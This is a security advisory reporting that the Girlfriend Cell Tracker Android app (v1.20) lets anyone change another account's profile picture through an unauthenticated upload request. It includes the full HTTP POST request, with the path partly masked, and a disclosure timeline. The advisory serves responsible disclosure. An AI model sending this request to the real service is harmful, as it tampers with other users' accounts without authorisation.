SIK-2017-051
Title:
Profile picture of any account can be changed unauthorized in Girlfriend Cell Tracker App
Report ID
SIK-2017-051
Summary:
- Vendor: SoftSquare InfoSoft
- Product: Girlfriend Cell Tracker (Package-Name: com.omrup.cell.tracker)
- Affected Version: v1.20
- Severity: Low
- Short summary: With only the userid (which can be leaked with SIK-2017-047) the profile pic can be changed of that account.
Details:
By sending the POST request
POST /****/api/upload_file.php HTTP/1.1
Content-Type: multipart/form-data; boundary=77a6d0f9-460d-42f4-8dc2-79280f16c0f2
Content-Length: 16468
Host: omsquare.in
Connection: Keep-Alive
Accept-Encoding: gzip
User-Agent: okhttp/2.4.0
--77a6d0f9-460d-42f4-8dc2-79280f16c0f2
Content-Disposition: form-data; name="file"; filename="cropped1506604715.jpg"
Content-Type: text/csv
Content-Length: 16134
[PICTURE DATA IN BINARY]
--77a6d0f9-460d-42f4-8dc2-79280f16c0f2
Content-Disposition: form-data; name="id"
Content-Length: 15
149865712068829 [USER ID TO CHANGE PROFILE PICTURE FOR]
--77a6d0f9-460d-42f4-8dc2-79280f16c0f2--
the profile picture can be uploaded and it will be set to the profile of the given user id.
All User-IDs can be extracted via SIK-2017-047.
Workaround
None.
Suggested Mitigation
Use some kind of authentication when uploading the profile pictures.
Timeline
- 2017-08-23: Vulnerability discovered
- 2017-08-29: First Email sent to developer
- 2018-08-11: Published